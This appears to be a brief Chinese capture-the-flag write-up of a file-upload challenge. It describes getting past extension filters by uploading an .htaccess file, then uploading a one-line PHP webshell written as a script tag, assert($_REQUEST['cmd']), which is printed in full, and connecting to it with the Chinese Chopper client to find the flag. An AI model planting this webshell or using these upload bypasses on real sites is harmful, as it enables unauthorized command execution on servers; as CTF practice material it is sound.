还是多积累吧,练得少没啥思路,借鉴其他大佬的wp
试了一下上传格式不支持.jpg和.gif,但是可以用png,根据提示不能上传带有ph的格式,试一下.hatcess,成功怼进去了
上传普通的一句话会被和谐掉,大佬说可能过滤了 <?
用js引用php可以绕过过滤
<script language='php'>assert($_REQUEST['cmd'])</script>
之后就可以用菜刀直接连接
但是终端用不了
在phpinfo中可以看到禁用了非常多的函数
不过可以直接在根目录下找到flag
相关文章: